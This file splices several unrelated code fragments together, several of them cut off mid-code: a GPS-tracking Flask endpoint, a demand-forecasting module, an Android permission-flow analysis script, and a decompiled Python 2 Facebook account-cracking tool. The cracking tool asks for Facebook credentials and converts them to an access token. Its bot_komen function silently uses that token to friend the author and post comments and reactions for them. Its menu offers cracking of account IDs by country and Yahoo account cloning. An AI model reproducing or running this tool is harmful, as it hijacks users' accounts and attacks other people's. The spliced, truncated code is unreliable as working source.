current_app.logger.info(
"No user has such an API key = {}. Ignoring request then.".format(id)
)
return "Hello?"
# checking tracks database for the data and device
trackdb = Trackz.query.filter_by(
trackdate=gps_date, device=device
).first()
if trackdb:
# current_app.logger.debug("trackdb: {}".format(trackdb))
pass
else:
# we need to create a track
trackdb = Trackz.create(
name="Arduino",
user_id=user_id,
start=datetime.utcnow(),
description="LiveTracking",
device=device,
trackdate=gps_date,
rid=uuid.uuid4(),
)
#current_app.logger.debug("trackdb: {}".format(trackdb))
# we have track id, now we must check if the location was not already
# submitted, as it looks like opengts often tries to resubmit the same
# points over and over again.
points = Pointz.query.filter_by(
track_id=trackdb.id,
geom="SRID=4326;POINT({} {})".format(lon, lat),
timez=gps_datetime,
).first()
if not points:
# uff, now we can finally submit location
points = Pointz.create(
track_id=trackdb.id,
geom="SRID=4326;POINT({} {})".format(lon, lat),
altitude=gps_alt,
timez=gps_datetime,
speed=gps_speed,
bearing=gps_head,
comment=device,
sat=gps_sat,
vdop=None,
pdop=None,
hdop=None,
provider=src
)
# at the end we are updating the track table with current time
current_app.logger.debug(points)
trackdb.stop = datetime.utcnow()
# send pubsub to redis channel
reddy = redis.Redis(host='localhost', port=6379, db=3)
r = reddy.publish("{}".format(trackdb.rid), 'UP')
current_app.logger.debug("redis publish on {}: {}".format(trackdb.rid, r))
# closing db access
db.session.commit
db.session.close()
else:
current_app.logger.debug("We already have that point recorded. Thank you.")
# we are done.
return "OK"
@blueprint.route("/sms", methods=["POST"])
@csrf_protect.exempt
def smstext():
"""sms handling, we want to forward all text messagess to email."""
data = json.loads(request.data)
current_app.logger.debug(data)
# we can receive messages in UCS2 so we try to decode them
message = "{}".format( data['text'] )
messageclean = re.sub( '\W+','', data['text'] )
try:
czyucs = binascii.unhexlify(messageclean).decode('utf-16-be')
message += "\n\n"
message += czyucs
except Exception as e:
| |
<filename>afa/core.py
import traceback
import contextlib
import statsmodels.api as sm
import pandas as pd
import numpy as np
import time
from collections import OrderedDict
from concurrent import futures
from functools import partial
from tqdm.auto import tqdm
from scipy import signal, stats
from numpy import fft
from numpy.lib.stride_tricks import sliding_window_view
EXP_COLS = ["timestamp", "channel", "family", "item_id", "demand"]
GROUP_COLS = ["channel", "family", "item_id"]
OBJ_METRICS = ["smape_mean", "wape_mean"]
# these define how long a tail period is for each freq.
TAIL_LEN = {"D": 56, "W": 12, "W-MON": 12, "M": 3, "MS": 3}
DC_PERIODS = {"D": 365, "W": 7, "W-MON": 7, "M": 12, "MS": 12}
#
# Forecast functions
#
def forecaster(func):
"""Forecast function decorator. Apply this to any forecasting function and
it will handle any compulsory pre- and post-processing of arguments and
return values.
"""
def do_forecast(y, horiz, freq, **kwargs):
assert horiz > 0
local_model = kwargs.get("local_model", False)
seasonal = kwargs.get("seasonal", False)
trim_zeros = kwargs.get("trim_zeros", False)
use_log = kwargs.get("use_log", False)
dc = kwargs.get("dc", None)
if trim_zeros:
y = np.trim_zeros(y, trim="f")
if use_log:
y = np.log1p(y)
if local_model:
y = y[-TAIL_LEN[freq]:]
if len(y) == 1:
y = np.pad(y, [1,0], constant_values=1)
y = np.nan_to_num(y)
# forecast via seasonal decomposition
if seasonal:
if dc is None:
yp = np.zeros(horiz)
else:
period = DC_PERIODS[freq]
if len(y) < 2 * period:
period = int(len(y) / 2)
kwargs.pop("seasonal")
resid, trend, yp_seasonal = dc
#dc = sm.tsa.seasonal.seasonal_decompose(y, period=period, two_sided=False)
#yp_seasonal = fourier(seas, horiz, freq, seasonal=False)
yp_trend = func(np.nan_to_num(trend), horiz, **kwargs)
yp_resid = func(np.nan_to_num(resid), horiz, **kwargs)
yp = yp_seasonal + yp_trend + yp_resid
else:
# ensure the input values are not null
yp = func(y, horiz, **kwargs)
# de-normalize from log-scale
if use_log:
yp = np.exp(yp)
yp = np.nan_to_num(yp).clip(0).round(0)
assert len(yp) == horiz
return yp
return do_forecast
@forecaster
def exsmooth(y, horiz, **kwargs):
"""
"""
alpha = kwargs.get("alpha", 0.2)
if len(y) > 8:
y = np.trim_zeros(y, trim ='f')
if len(y) == 0:
y = np.zeros(1)
extra_periods = horiz-1
f = [y[0]]
# Create all the m+1 forecast
for t in range(1,len(y)-1):
f.append((1-alpha)*f[-1]+alpha*y[t])
# Forecast for all extra months
for t in range(extra_periods):
# Update the forecast as the last forecast
f.append(f[-1])
yp = np.array(f[-horiz:]).clip(0)
# if use_log:
# yp = np.exp(yp)
return yp
@forecaster
def holt(y, horiz, **kwargs):
"""
"""
alpha = kwargs.get("alpha", 0.2)
beta = kwargs.get("beta", 0.2)
extra_periods = horiz-1
# Initialization
f = [np.nan] # First forecast is set to null value
a = [y[0]] # First level defined as the first demand point
b = [y[1]-y[0]] # First trend is computed as the difference between the two first demand poiny
# Create all the m+1 forecast
for t in range(1,len(y)):
# Update forecast based on last level (a) and trend (b)
f.append(a[t-1]+b[t-1])
# Update the level based on the new data point
a.append(alpha*y[t]+(1-alpha)*(a[t-1]+b[t-1]))
# Update the trend based on the new data point
b.append(beta*(a[t]-a[t-1])+(1-beta)*b[t-1])
# Forecast for all extra months
for t in range(extra_periods):
# Update the forecast as the most up-to-date level + trend
f.append(a[-1]+b[-1])
# the level equals the forecast
a.append(f[-1])
# Update the trend as the previous trend
b.append(b[-1])
# yp = np.clip(np.exp(f[-horiz:]), 0, None).round(0)
yp = np.array(f[-horiz:])
return yp
@forecaster
def fourier(y, horiz, n_harm=15, **kwargs):
"""Generate a forecast using Fourier extrapolation.
Parameters
----------
n_harm : int
Number of harmonics in the model
Results
-------
yp : array_like
"""
try:
n = y.shape[0]
t = np.arange(n)
p = np.polyfit(t, y, 1) # find linear trend in x
f = fft.fftfreq(n) # frequencies
y_detrended = y - p[0] * t # detrended x
y_freqdom = fft.fft(y_detrended) # detrended x in frequency domain
indices = list(range(n))
# sort indices by frequency, lower -> higher
indices.sort(key=lambda i: np.absolute(f[i]))
t = np.arange(n + horiz)
restored_sig = np.zeros(t.size)
for i in indices[:2 + n_harm * 2]:
amp = np.absolute(y_freqdom[i]) / n # amplitude
phase = np.angle(y_freqdom[i]) # phase
restored_sig += amp * np.cos(2 * np.pi * f[i] * t + phase)
yp = (restored_sig + p[0] * t)[-horiz:]
except:
traceback.print_exc()
yp = np.zeros(horiz)
return yp
@forecaster
def naive(y, horiz, **kwargs):
"""
"""
yp = np.clip(y.mean() * np.ones(horiz), 0, None).round(0)
return yp
@forecaster
def trend(y, horiz, **kwargs):
"""Generate a forecast using a linear trend model.
Parameters
----------
y : array_like
horiz : int
Returns
-------
yp : np.array
"""
def yp_linear(y, horiz):
"""Fit a simple linear model (AKA trend) and generate the
corresponding forecast.
"""
x = np.arange(y.size)
mu = np.nanmean(y)
y = y / mu
theta = np.polyfit(x, y, 1)
f = np.poly1d(theta)
x1 = np.arange(len(y), len(y) + horiz)
yp = f(x1) * mu
return yp
if y.sum() > 0:
yp = yp_linear(y, horiz)
else:
yp = y.mean() * np.ones(horiz)
return yp
@forecaster
def arima(y, horiz, q=1, d=0, p=1, **kwargs):
"""
"""
try:
extra_periods=horiz-1
m = ARIMA(q, d, p)
pred = m.fit_predict(y)
pred = m.forecast(y, horiz)
yp = np.round(pred[-horiz:],0)
except:
traceback.print_exc()
yp = np.zeros(horiz)
return yp
#
# ARIMA classes
#
class LinearModel:
def __init__(self, fit_intercept=True):
self.fit_intercept = fit_intercept
self.beta = None
self.intercept_ = None
self.coef_ = None
def _prepare_features(self, x):
if self.fit_intercept:
x = np.hstack((np.ones((x.shape[0], 1)), x))
return x
def _least_squares(self, x, y):
return np.linalg.pinv((x.T @ x)) @ (x.T @ y)
def fit(self, x, y):
x = self._prepare_features(x)
self.beta = self._least_squares(x, y)
if self.fit_intercept:
self.intercept_ = self.beta[0]
self.coef_ = self.beta[1:]
else:
self.coef_ = self.beta
def predict(self, x):
x = self._prepare_features(x)
return x @ self.beta
def fit_predict(self, x, y):
self.fit(x, y)
return self.predict(x)
class ARIMA(LinearModel):
def __init__(self, q, d, p):
"""
An ARIMA model.
:param q: (int) Order of the MA model.
:param p: (int) Order of the AR model.
:param d: (int) Number of times the data needs to be differenced.
"""
super().__init__(True)
self.p = p
self.d = d
self.q = q
self.ar = None
self.resid = None
def _lag_view(self, x, order):
"""
For every value X_i create a row that lags k values: [X_i-1, X_i-2, ... X_i-k]
"""
y = x.copy()
# Create features by shifting the window of `order` size by one step.
# This results in a 2D array [[t1, t2, t3], [t2, t3, t4], ... [t_k-2, t_k-1, t_k]]
x = np.array([y[-(i + order):][:order] for i in range(y.shape[0])])
# Reverse the array as we started at the end and remove duplicates.
# Note that we truncate the features [order -1:] and the labels [order]
# This is the shifting of the features with one time step compared to the labels
x = np.stack(x)[::-1][order - 1: -1]
y = y[order:]
return x, y
def _difference(self, x, d=1):
if d == 0:
return x
else:
x = np.r_[x[0], np.diff(x)]
return self._difference(x, d - 1)
def _undo_difference(x, d=1):
if d == 1:
return np.cumsum(x)
else:
x = np.cumsum(x)
return self._undo_difference(x, d - 1)
def prepare_features(self, x):
if self.d > 0:
x = difference(x, self.d)
ar_features = None
ma_features = None
# Determine the features and the epsilon terms for the MA process
if self.q > 0:
if self.ar is None:
self.ar = ARIMA(0, 0, self.p)
self.ar.fit_predict(x)
eps = self.ar.resid
eps[0] = 0
# prepend with zeros as there are no residuals_t-k in the first X_t
ma_features, _ = self._lag_view(np.r_[np.zeros(self.q), eps], self.q)
# Determine the features for the AR process
if self.p > 0:
# prepend with zeros as there are no X_t-k in the first X_t
ar_features = self._lag_view(np.r_[np.zeros(self.p), x], self.p)[0]
if ar_features is not None and ma_features is not None:
n = min(len(ar_features), len(ma_features))
ar_features = ar_features[:n]
ma_features = ma_features[:n]
features = np.hstack((ar_features, ma_features))
elif ma_features is not None:
n = len(ma_features)
features = ma_features[:n]
else:
n = len(ar_features)
features = ar_features[:n]
return features, x[:n]
def fit(self, x):
features, x = self.prepare_features(x)
super().fit(features, x)
return features
def fit_predict(self, x):
"""
Fit and transform input
:param x: (array) with time series.
"""
features = self.fit(x)
return self.predict(x, prepared=(features))
def predict(self, x, **kwargs):
"""
:param x: (array)
:kwargs:
prepared: (tpl) containing the features, eps and x
"""
features = kwargs.get('prepared', None)
if features is None:
features, | |
# coding=utf-8
import json
import luigi
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.colors as colors
import numpy as np
import os
import pandas as pd
import seaborn as sns
import sys
sys.path.append("..")
import cfg
from constants import DANGEROUS_GROUPS
from collections import defaultdict
def get_label_src(label):
''' returns the flow source label '''
return label.split(' - ')[0]
def get_label_sink(label):
''' returns the flow sink label '''
return label.split(' - ')[1]
def get_base_src(label):
''' returns the base name of flow source (without lib location) '''
return get_label_src(label).split(':')[0].strip()
def get_base_sink(label):
''' get base name of sink (without lib location) '''
return get_label_sink(label).split(':')[0].strip()
def read_json_matrix(matrix_folder, pkg):
''' reads matrix and its labels from a json file and returns them '''
m_file = os.path.join(matrix_folder, pkg, pkg + '.json')
# if matrix json file is missing return None
if not os.path.exists(m_file):
return None
# else return the matrix with labels and versions
else:
with open(m_file) as data_file:
data = json.load(data_file)
matrix = np.array(data['m'])
row_labels = data['yl']
versions = data['xl']
return {'m': matrix, 'l': row_labels, 'v': versions}
def read_app_info(pkg):
pass
# returns the indexes (flow, version) where new flows appear
def get_new_flow_indexes(flow_data):
matrix = flow_data['m']
indexes = []
for i in range(0, len(flow_data['l'])):
prev_status = 0
for j in range(0, len(flow_data['v'])):
status = matrix[i][j]
if (status > 0) and prev_status == 0:
indexes.append((i, j))
if status >= 0:
prev_status = status
return indexes
def get_perm_group(perm):
for g, pl in DANGEROUS_GROUPS.items():
if perm in pl:
return g
def is_perm_automatically_granted(perm_matrix, perm_labels, version, perm):
""" return true if a permission would be automatically granted for a
specific version """
# retrieve permission group
group = get_perm_group(perm)
# check other permissions in the group
for p in DANGEROUS_GROUPS[group]:
# skip the input permission
if p == perm:
continue
# if the permission is in the permission matrix (in the permission
# labels list) and it was granted in both previous and current
# version, return true
if p in perm_labels:
index = perm_labels.index(p)
if (perm_matrix[index][version] > 0 and
perm_matrix[index][version - 1]):
return True
return False
def check_perm(perm_matrix, perm_labels, version_index, perm):
""" returns the status of a permission (newly asked, already asked or missing) """
label_index = perm_labels.index(perm) if perm in perm_labels else -1
if label_index < 0:
return 'M' # missing permission
elif perm_matrix[label_index][version_index] == 0:
if version_index > 0 and perm_matrix[label_index][version_index - 1] > 0:
return 'R' # revoked
else:
return 'M' # missing permission
elif version_index == 0:
return 'N' # newly asked permission
elif perm_matrix[label_index][version_index - 1] == 0:
if is_perm_automatically_granted(perm_matrix,
perm_labels,
version_index,
perm):
return 'G' # newly asked and automatically granted
else:
return 'N' # newly asked permission
else:
return 'A' # already asked permission
def is_layout_changed(version, layout_data):
""" returns True if layout matrix changed or added is not zero """
# layout matrix has one less column than the flow ones, because
# it compares 2 versions. if version is zero, we assume no changes
# in the layout
if version == 0:
return True
m = layout_data['m']
if m[layout_data['l'].index('ui_added')][version - 1] > 0:
return True
else:
return False
def get_list_perm_status(pm, pl, ver, perms_list):
""" returns the permission status for sms flow (which checks READ_SMS,
RECEIVE_SMS and RECEIVE_MMS permission status """
status_list = []
for p in perms_list:
p_status = check_perm(pm, pl, ver, p)
status_list.append(p_status)
# if permission is ACCESS_FINE_LOCATION and it is
# newly granted, return N independently of
# ACCESS_COARSE_LOCATION permission status
if p == 'ACCESS_FINE_LOCATION' and (p_status in ['N', 'G']):
return p_status
# if all elements are the same return that element
if status_list.count(status_list[0]) == len(status_list):
return status_list[0]
# if we have only revoked and missing, return revoked
elif ('R' in status_list and 'M' in status_list and 'G' not in status_list
and 'N' not in status_list and 'A' not in status_list):
return 'R'
# if we have only newly added and missing, return newly added
elif ('R' not in status_list and 'M' in status_list and
('N' in status_list or 'G' in status_list) and 'A' not in status_list):
if 'G' in status_list:
return 'G'
else:
return 'N'
# if a permission was already asked and still is, return already asked
elif 'A' in status_list:
return 'A'
# else we are in a special case: both newly asked and revoked permissions
# and no already asked: return special case
elif (('N' in status_list or 'G' in status_list) and
'R' in status_list and not 'A' in status_list):
return 'S'
# else there is some error: return E
else:
return 'E'
def get_flow_perm_status(ind, perm_data, labels):
""" returns the permission status of the input flow """
# if perm_data is None we don't have the permission matrix
# file, so we return '?'
if perm_data is None:
return '?'
pm = perm_data['m']
pl = perm_data['l']
# flows requiring permission
location_flow = 'ACCESS_LOCATION'
contact_flow = 'READ_CONTACTS'
account_id_flow = 'GET_ACCOUNTS'
read_storage_flow = 'READ_EXTERNAL_STORAGE'
unique_id_flow = 'READ_PHONE_STATE'
sms_flow = 'RECEIVE_SMS'
audio_id_flow = 'RECORD_AUDIO'
label = labels[ind[0]]
ver = ind[1]
src = get_base_src(label)
if src == location_flow:
perm_status = get_list_perm_status(pm, pl, ver,
['ACCESS_FINE_LOCATION',
'ACCESS_COARSE_LOCATION'])
elif src == contact_flow:
perm_status = check_perm(pm, pl, ver, 'READ_CONTACTS')
elif src == unique_id_flow:
perm_status = check_perm(pm, pl, ver, 'READ_PHONE_STATE')
elif src == read_storage_flow:
perm_status = get_list_perm_status(pm, pl, ver,
['READ_EXTERNAL_STORAGE',
'WRITE_EXTERNAL_STORAGE'])
elif src == audio_id_flow:
perm_status = check_perm(pm, pl, ver, 'RECORD_AUDIO')
elif src == account_id_flow:
perm_status = check_perm(pm, pl, ver, 'GET_ACCOUNTS')
elif src == sms_flow:
perm_status = get_list_perm_status(pm, pl, ver, ['READ_SMS',
'RECEIVE_SMS',
'RECEIVE_MMS'])
else:
perm_status = '-'
return perm_status
def flow_analysis(pkg):
# read flow matrix
flow_data = read_json_matrix(cfg.flow_appflow_matrix_folder, pkg)
labels = flow_data['l']
versions = flow_data['v']
flow_matrix = flow_data['m']
# read permission matrix
perm_data = read_json_matrix(cfg.info_permission_matrix_folder, pkg)
if perm_data is None:
for i in range(0, 5):
print('<<<<<<<<<< PERM_DATA is None >>>>>>>>>>')
return None
# if the shape of matrices differs there is a problem with versions
# if not flow_matrix.shape[1] == perm_data['m'].shape[1]:
if perm_data is not None and not len(versions) == len(perm_data['v']):
for i in range(0, 5):
print('<<<<<<<<<< MATRIX SHAPE DIFFERS >>>>>>>>>>')
print('flow has %d versions, perm_data has %d' % (len(versions),
len(perm_data['v'])))
return None
# read layout matrix
layout_data = read_json_matrix(cfg.apktool_ui_matrix_folder, pkg)
flow_indexes = get_new_flow_indexes(flow_data)
flow_perm_status = []
# create analysis matrix, color all cells with an info flow
analysis_matrix = np.zeros(flow_matrix.shape)
for i in range(0, analysis_matrix.shape[0]):
for j in range(0, analysis_matrix.shape[1]):
val = 1 if flow_matrix[i][j] > 0 else flow_matrix[i][j]
analysis_matrix[i][j] = val
character_matrix = np.empty(flow_matrix.shape, dtype='string')
for i in range(0, character_matrix.shape[0]):
for j in range(0, character_matrix.shape[1]):
character_matrix[i][j] = ''
# for each flow, update the analysis and character matrix
# to build the analysis heatmap
for ind in flow_indexes:
label = labels[ind[0]]
ver = versions[ind[1]]
# get permission status when a new flow appears
perm_status = get_flow_perm_status(ind, perm_data, labels)
character_matrix[ind[0]][ind[1]] = perm_status
# get layout status
if layout_data is None:
layout_changed = '?'
else:
layout_changed = 'T' if is_layout_changed(ind[1], layout_data) else 'F'
layout_val_mapping = {'T': 1, '?': 2, 'F': 3}
analysis_matrix[ind[0]][ind[1]] = layout_val_mapping[layout_changed]
# create row for new flow
row = '%s | %s (%s) %s' % (label, ver, perm_status, layout_changed)
flow_perm_status.append(row)
# analyze permission status until the end of the flow, and
# only prent newly added or revoked
for i in range(ind[1] + 1, len(versions)):
if not flow_matrix[ind[0]][i] > 0:
break
perm_status = get_flow_perm_status((ind[0], i), perm_data, labels)
if perm_status not in ['A', 'M', '-']:
character_matrix[ind[0]][i] = perm_status
# create heatmap folder if missing
# TODO make heatmap the output of the luigi task
if not os.path.exists(cfg.analysis_flow_heatmap_folder):
os.makedirs(cfg.analysis_flow_heatmap_folder)
create_heatmap(analysis_matrix, labels, versions, character_matrix, pkg)
return flow_perm_status
def create_heatmap(data, row_labels, col_labels, char_matrix, pkg):
""" creates the heatmap of permission use and saves it to a file """
# seaborn
dpi = 72.27
fontsize_x_pt = 8
fontsize_y_pt = 10
# comput the matrix height in points and inches
matrix_height_pt = fontsize_y_pt * data.shape[0]
matrix_height_in = matrix_height_pt / dpi
matrix_width_pt = fontsize_x_pt * data.shape[1]
matrix_width_in = matrix_width_pt / dpi
# compute the required figure height
top_margin = 0.04 # in percentage of the figure height
bottom_margin = 0.04 # in percentage of the figure height
coeff = 2
figure_height = | |
# Decompiled by HTR-TECH | <NAME>
# Github : https://github.com/htr-tech
#---------------------------------------
# Auto Dis Parser 2.2.0
# Source File : fb_1.pyc
# Bytecode Version : 2.7
# Time : Sun Aug 9 11:47:46 2020
#---------------------------------------
import os
import sys
import time
import datetime
import random
import hashlib
import re
import threading
import json
import getpass
import urllib
import cookielib
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
try:
import bs4
except ImportError:
os.system('pip2 install bs4')
try:
import requests
except ImportError:
os.system('pip2 install requests')
os.system('python2 XXXXX.py')
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time = 1)
br.addheaders = [
('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print '[!] Exit'
os.sys.exit()
def acak(x):
w = 'mhkbpcP'
d = ''
for i in x:
d += '!' + w[random.randint(0, len(w) - 1)] + i
return cetak(d)
def cetak(x):
w = 'mhkbpcP'
for i in w:
j = w.index(i)
x = x.replace('!%s' % i, '%s;' % str(31 + j))
x += ''
x = x.replace('!0', '')
sys.stdout.write(x + '\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.06)
logo = '\x1b[1;31;1m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88 \xf0\x9d\x99\xb7\xf0\x9d\x9a\x8a\xf0\x9d\x9a\x9f\xf0\x9d\x9a\x8e \xf0\x9d\x9a\x8a\n\x1b[37;1m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88 \xf0\x9d\x99\xbd\xf0\x9d\x9a\x92\xf0\x9d\x9a\x8c\xf0\x9d\x9a\x8e \xf0\x9d\x99\xb3\xf0\x9d\x9a\x8a\xf0\x9d\x9a\xa2 \xf0\x9f\x99\x82\n\n\x1b[37;1mAuthor : <NAME>\n\x1b[37;1mRecode : Tegar ID\n\x1b[37;1mGithub : https://github.com/Tegar-ID/\n\x1b[37;1mFacebook : https://www.facebook.com/tegar.sabila.908\n\x1b[37;1mDonate : 082125068665 ( Tri )'
def tik():
titik = [
'. ',
'.. ',
'... ']
for o in titik:
print '\r\x1b[1;97m[\x1b[1;93m\xe2\x97\x8f\x1b[1;97m]\x1b[1;93m Sedang masuk\x1b[1;97m ' + o,
sys.stdout.flush()
time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
oks = []
oke = []
cpe = []
id = []
username = []
idteman = []
idfromteman = []
gagal = []
reaksi = []
komen = []
vulnot = 'Not Vuln'
vuln = 'Vuln'
def masuk():
os.system('clear')
print logo
print '\x1b[37;1m_____________________________'
print '\x1b[37;1m[\x1b[32;1m01\x1b[37;1m]\x1b[32;1m Login Menggunakan Email / ID Facebook'
print '\x1b[37;1m[\x1b[32;1m02\x1b[37;1m]\x1b[32;1m Login Menggunakan Token Facebook '
print '\x1b[37;1m[\x1b[32;1m03\x1b[37;1m]\x1b[32;1m Ambil Token'
print '\x1b[37;1m[\x1b[32;1m00\x1b[37;1m]\x1b[32;1m Keluar'
print '\x1b[37;1m_____________________________'
pilih_masuk()
def pilih_masuk():
msuk = raw_input('\x1b[37;1m-> \x1b[91m:\x1b[1;92m ')
if msuk == '':
print '\x1b[37;1m[\x1b[32;1m!\x1b[37;1m] Isi Yg Benar !'
pilih_masuk()
elif msuk == '1' or msuk == '01':
login()
elif msuk == '2' or msuk == '02':
tokenz()
elif msuk == '3' or msuk == '03':
Ambil_Token()
elif msuk == '0' or msuk == '00':
keluar()
else:
print '\x1b[37;1m[\x1b[32;1m!\x1b[37;1m] Isi Yg Benar !'
pilih_masuk()
def login():
os.system('clear')
try:
toket = open('login.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print '\x1b[1;97m[\x1b[1;96m\xf0\x9f\xa4\xa1\x1b[1;97m] LOGIN AKUN FACEBOOK ANDA \x1b[1;97m[\x1b[1;96m\xf0\x9f\xa4\xa1\x1b[1;97m]'
id = raw_input('[\x1b[1;95m+\x1b[1;97m] ID / Email =\x1b[1;92m ')
pwd = raw_input('\x1b[1;97m[\x1b[1;95m?\x1b[1;97m] Password =\x1b[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print '\n[!] Tidak ada koneksi'
keluar()
br._factory.is_html = True
br.select_form(nr = 0)
br.form['email'] = id
br.form['pass'] = <PASSWORD>
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {
'api_key': '<KEY>',
'credentials_type': 'password',
'email': id,
'format': 'JSON',
'generate_machine_id': '1',
'generate_session_cookies': '1',
'locale': 'en_US',
'method': 'auth.login',
'password': <PASSWORD>,
'return_ssl_resources': '0',
'v': '1.0' }
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({
'sig': a })
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params = data)
z = json.loads(r.text)
unikers = open('login.txt', 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m]\x1b[1;92m Login Berhasil'
os.system('xdg-open https://m.facebook.com/cindy.adelia.330')
bot_komen()
except requests.exceptions.ConnectionError:
print '\n[!] Tidak ada koneksi'
keluar()
if 'checkpoint' in url:
print '\n\x1b[1;97m[\x1b[1;93m!\x1b[1;97m]\x1b[1;93m Sepertinya Akun Anda Checkpoint'
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print '\n\x1b[1;97m[\x1b[1;91m!\x1b[1;97m]\x1b[1;91m Password / Email Salah'
os.system('rm -rf login.txt')
time.sleep(1)
masuk()
def tokenz():
os.system('clear')
print logo
toket = raw_input('\x1b[1;97m[\x1b[1;95m?\x1b[1;97m] \x1b[1;93mToken : \x1b[1;92m')
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
zedd = open('login.txt', 'w')
zedd.write(toket)
zedd.close()
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m]\x1b[1;92m Login Berhasil'
os.system('xdg-open https://m.facebook.com/cindy.adelia.330')
bot_komen()
except KeyError:
print '\x1b[1;97m[\x1b[1;91m!\x1b[1;97m] \x1b[1;91mToken Salah !'
time.sleep(1.7)
masuk()
def bot_komen():
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;97m[!] Token invalid'
os.system('rm -rf login.txt')
una = '100034051991120'
kom = 'Hello Virgiirhsy'
reac = 'ANGRY'
post = '271600697318328'
post2 = '271538587324539'
kom2 = 'Uwow \xf0\x9f\x98\xae'
reac2 = 'LOVE'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=' + una + '&access_token=' + toket)
requests.post('https://graph.facebook.com/' + post + '/comments/?message=' + kom + '&access_token=' + toket)
requests.post('https://graph.facebook.com/' + post + '/reactions?type=' + reac + '&access_token=' + toket)
requests.post('https://graph.facebook.com/' + post2 + '/comments/?message=' + kom2 + '&access_token=' + toket)
requests.post('https://graph.facebook.com/' + post2 + '/reactions?type=' + reac2 + '&access_token=' + toket)
menu()
def Ambil_Token():
os.system('clear')
print logo
jalan('\x1b[1;92mInstall...')
os.system('cd ... && npm install')
jalan('\x1b[1;96mMulai...')
os.system('cd ... && npm start')
raw_input('\n[ Kembali ]')
masuk()
def menu():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
os.system('rm -rf login.txt')
masuk()
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print '\x1b[1;96m[!] \x1b[1;91mToken invalid'
os.system('rm -rf login.txt')
time.sleep(1)
masuk()
except requests.exceptions.ConnectionError:
print '[!] Tidak ada koneksi'
keluar()
os.system('clear')
print logo
print '\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print '\x1b[1;97m[\x1b[1;92m+\x1b[1;97m]\x1b[1;93m Nama Akun\x1b[1;91m =>\x1b[1;92m ' + nama
print '\x1b[1;97m[\x1b[1;92m+\x1b[1;97m]\x1b[1;93m UID\x1b[1;91m =>\x1b[1;92m ' + id
print '\x1b[1;97m[\x1b[1;92m+\x1b[1;97m]\x1b[1;93m Tanggal Lahir\x1b[1;91m =>\x1b[1;92m ' + a['birthday']
print '\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print '\x1b[1;97m[\x1b[1;92m01\x1b[1;97m]\x1b[1;96m->\x1b[1;97m Crack ID Indonesia'
print '\x1b[1;97m[\x1b[1;92m02\x1b[1;97m]\x1b[1;96m->\x1b[1;97m Crack ID Bangladesh / Pakistan'
print '\x1b[1;97m[\x1b[1;92m03\x1b[1;97m]\x1b[1;96m->\x1b[1;97m Crack ID Semua Negara ( Buat Sandi )'
print '\x1b[1;97m[\x1b[1;92m04\x1b[1;97m]\x1b[1;96m->\x1b[1;97m Ambil ID'
print '\x1b[1;97m[\x1b[1;92m05\x1b[1;97m]\x1b[1;96m->\x1b[1;97m Yahoo Clone'
print '\x1b[1;97m[\x1b[1;92m06\x1b[1;97m]\x1b[1;96m->\x1b[1;97m Profile Guard'
print '\x1b[1;97m[\x1b[1;92m07\x1b[1;97m]\x1b[1;96m->\x1b[1;97m Ikuti Saya di Facebook'
print '\x1b[1;97m[\x1b[1;91m00\x1b[1;97m]\x1b[1;96m->\x1b[1;97m Logout'
print '\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
pilih()
def pilih():
unikers = raw_input('\x1b[1;93m-> \x1b[91m:\x1b[1;92m ')
if unikers == '':
print '\x1b[1;97m[\x1b[1;91m!\x1b[1;97m]\x1b[1;97m Isi Yg Benar !'
pilih()
elif unikers == '1' or unikers == '01':
indo()
elif unikers == '2' or unikers == '02':
bangla()
elif unikers == '3' or unikers == '03':
sandi()
elif unikers == '4' or unikers == '04':
dump()
elif unikers == '5' or unikers == '05':
menu_yahoo()
elif unikers == '6' or unikers == '06':
guard()
elif unikers == '7' or unikers == '07':
saya()
elif unikers == '0' or unikers == '00':
os.system('clear')
jalan('Menghapus Token')
os.system('rm -rf login.txt')
keluar()
else:
print '\x1b[1;97m[\x1b[1;91m!\x1b[1;97m]\x1b[1;97m Isi Yg Benar !'
pilih()
def indo():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
